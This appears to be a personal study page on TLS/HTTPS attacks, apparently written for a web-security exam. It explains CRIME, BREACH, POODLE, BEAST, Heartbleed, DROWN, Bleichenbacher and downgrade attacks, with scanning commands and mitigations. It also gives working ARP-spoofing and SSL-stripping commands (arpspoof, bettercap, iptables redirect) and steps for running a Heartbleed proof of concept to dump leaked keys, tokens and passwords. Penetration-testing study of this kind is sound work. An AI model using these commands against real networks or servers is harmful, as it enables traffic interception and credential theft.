KagisoSec_
Web
WEB

TLS / HTTPS Attacks

TLS attack surface: CRIME/BREACH compression oracle, SSL stripping (arpspoof/bettercap), POODLE/BEAST CBC padding, Heartbleed memory leak, DROWN cross-protocol, Bleichenbacher RSA oracle, downgrade attacks, and testssl.sh scanning.

web tls ssl crime breach heartbleed ssl-stripping cwee

TLS Attack Landscape

TLS vulnerabilities generally fall into three categories:

  • Protocol downgrade — force use of an older, weaker protocol version (SSL 3.0, TLS 1.0)
  • Compression oracle — exploit TLS/HTTP compression to extract secrets byte-by-byte
  • Implementation bugs — memory leaks (Heartbleed), RSA oracle (Bleichenbacher), padding oracle (POODLE)

Detection — TLS Configuration Scanning

# testssl.sh — comprehensive TLS scanner
git clone https://github.com/drwetter/testssl.sh
cd testssl.sh && ./testssl.sh TARGET:443

# Specific checks
./testssl.sh --poodle TARGET:443
./testssl.sh --beast TARGET:443
./testssl.sh --crime TARGET:443
./testssl.sh --breach TARGET:443
./testssl.sh --heartbleed TARGET:443
./testssl.sh --drown TARGET:443

# Nmap TLS scripts
nmap --script ssl-enum-ciphers -p 443 TARGET
nmap --script ssl-poodle -p 443 TARGET
nmap --script ssl-heartbleed -p 443 TARGET
nmap --script ssl-dh-params -p 443 TARGET

# sslscan
sslscan TARGET:443

Attack 1: CRIME (Compression Ratio Info-leak Made Easy)

Requires: TLS compression enabled (DEFLATE) + attacker can inject controlled data into requests

How it works: If the attacker can control part of a TLS request that also contains a secret (session cookie), they can guess the secret character by character by observing compressed message sizes. Matching characters compress better → smaller size → correct guess.

Detection:

# Check if TLS compression is enabled
./testssl.sh --crime TARGET:443
openssl s_client -connect TARGET:443 | grep "Compression"
# Safe: "Compression: NONE"
# Vulnerable: "Compression: zlib compression"

Mitigation: Disable TLS compression (TLS_COMP_NULL) — modern TLS 1.3 doesn’t support compression.

Attack 2: BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext)

Requires: HTTP-level compression (gzip/deflate) enabled + the secret appears in HTTP response body + attacker can inject data into requests (e.g., CSRF via a cross-site iframe)

How it works: Similar to CRIME but targets HTTP response body compression. The attacker injects guesses for a CSRF token into requests; if the token appears in the compressed response, a matching guess reduces the compressed size.

Detection:

# Check if HTTP responses are gzip-compressed AND contain secrets
curl -I -H "Accept-Encoding: gzip" https://TARGET/account
# Look for: Content-Encoding: gzip + CSRF token in body

Mitigation options:

  • Disable HTTP compression for pages containing secrets
  • Separate secrets from attacker-controlled data (different responses)
  • Use randomised CSRF tokens that change per-request (masking)
  • Add random padding to responses

Attack 3: SSL Stripping (HTTP Downgrade / MitM)

Requires: Attacker is on-path (same LAN, coffee shop, ARP poisoning) + target site doesn’t enforce HSTS

How it works:

  1. Attacker ARP-spoofs to intercept victim’s traffic.
  2. Victim’s HTTP request to http://example.com → intercepted.
  3. Attacker makes HTTPS connection to the real server.
  4. Attacker serves HTTP to the victim — victim sees no lock icon.
  5. Attacker reads all plaintext victim traffic.

Tools:

# ARP spoofing setup
sudo apt install dsniff
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP    # poison victim → gateway
sudo arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP    # poison gateway → victim

# bettercap (all-in-one)
sudo bettercap
# In bettercap REPL:
net.probe on
arp.spoof on
set arp.spoof.targets VICTIM_IP
http.proxy on
set http.proxy.sslstrip true
net.sniff on

# SSLstrip
sudo python3 sslstrip.py -l 10000 -w strip.log
# Then redirect HTTP traffic to port 10000 via iptables
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

HSTS bypass (first-visit attack):

  • HSTS only works after the first HTTPS visit. On the first visit, a victim browsing http://example.com (no HTTPS forced) is still vulnerable.
  • Domains not in the HSTS preload list are vulnerable to first-visit stripping.

Mitigation:

  • Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  • Submit to HSTS preload list at hstspreload.org

Attack 4: POODLE (Padding Oracle On Downgraded Legacy Encryption)

Requires: SSL 3.0 still supported by server + attacker can trigger SSL 3.0 downgrade

How it works: SSL 3.0 uses CBC with non-deterministic padding. The attacker can decrypt one byte per 256 requests by substituting CBC blocks and observing if padding is valid.

Detection:

nmap --script ssl-poodle -p 443 TARGET
./testssl.sh --poodle TARGET:443

# Manual check — does server accept SSL 3.0?
openssl s_client -ssl3 -connect TARGET:443
# If handshake completes → vulnerable to POODLE

Mitigation: Disable SSL 3.0 entirely in server config.

Attack 5: BEAST (Browser Exploit Against SSL/TLS)

Requires: TLS 1.0 with CBC cipher + JavaScript running in victim’s browser (MitM + JavaScript injection)

How it works: TLS 1.0 uses predictable IV chaining in CBC mode. An attacker with a chosen-plaintext oracle (JavaScript in the same browser) can decrypt HTTPS cookies by guessing one byte at a time.

Detection:

# Check if TLS 1.0 is enabled with CBC ciphers
nmap --script ssl-enum-ciphers -p 443 TARGET | grep "TLSv1.0"
./testssl.sh --beast TARGET:443

Mitigation: Disable TLS 1.0; use TLS 1.2+ with AEAD ciphers (AES-GCM).

Attack 6: Heartbleed (CVE-2014-0160)

Requires: OpenSSL 1.0.1 through 1.0.1f

How it works: A malformed TLS heartbeat request with an inflated length parameter causes OpenSSL to read 64KB of adjacent heap memory — potentially containing private keys, session tokens, passwords.

Detection:

nmap --script ssl-heartbleed -p 443 TARGET
./testssl.sh --heartbleed TARGET:443

# Python scanner
python3 heartbleed.py TARGET 443

# Using sslscan
sslscan --show-certificate TARGET:443 | grep "Heartbleed"

Manual exploitation:

git clone https://github.com/sensepost/heartbleed-poc
python heartbleed-poc.py TARGET -p 443

# Dump leaked memory repeatedly — look for:
# - Private key fragments
# - Session tokens / cookies
# - Usernames/passwords in plaintext

Attack 7: DROWN (Decrypting RSA with Obsolete and Weakened eNcryption)

Requires: SSLv2 enabled on the server (or a server sharing the same private key as one with SSLv2)

How it works: An attacker uses an SSLv2 oracle to decrypt modern TLS sessions that use RSA key exchange. If the target server (or any server sharing the same private key) supports SSLv2, the attacker can brute-force RSA-encrypted pre-master secrets.

Detection:

./testssl.sh --drown TARGET:443
nmap --script sslv2 TARGET

# Check if SSLv2 is enabled
openssl s_client -ssl2 -connect TARGET:443

Mitigation: Disable SSLv2 completely. Ensure private keys aren’t shared with vulnerable servers.

Attack 8: Bleichenbacher (RSA PKCS#1 Padding Oracle)

Requires: Server leaks whether RSA PKCS#1 v1.5 padding is valid (through timing, error message, or behaviour difference)

How it works: By sending millions of modified RSA ciphertexts and observing the server’s response (valid/invalid padding oracle), an attacker can recover the plaintext (pre-master secret) of a captured TLS session — decrypting it without the private key.

Detection:

# ROBOT test (Return Of Bleichenbacher's Oracle Threat)
git clone https://github.com/RUB-NDS/ROBOT-Detect
python robot-detect.py TARGET

./testssl.sh --robot TARGET:443

Attack 9: Downgrade Attack

Force the client and server to negotiate a weaker protocol:

# Test if server accepts TLS 1.0 / 1.1
openssl s_client -tls1 -connect TARGET:443     # TLS 1.0
openssl s_client -tls1_1 -connect TARGET:443   # TLS 1.1

# Test if server accepts weak ciphers
openssl s_client -cipher NULL -connect TARGET:443
openssl s_client -cipher EXPORT -connect TARGET:443
openssl s_client -cipher RC4 -connect TARGET:443

If any of these complete the handshake → downgrade is possible.

Burp Suite workflow

  1. Proxy — configure to intercept HTTPS; check cipher suite in TLS details.
  2. Scanner — passive scan reports weak TLS configs, missing HSTS headers.
  3. For SSL stripping: use bettercap on the same network; observe Burp proxy traffic switch from HTTPS to HTTP.
  4. testssl.sh is the primary external tool — run it before any TLS-related finding.
  5. For BEAST/POODLE/CRIME: these are passive/oracle attacks — use testssl.sh to confirm presence, then reference the CVE for the exam.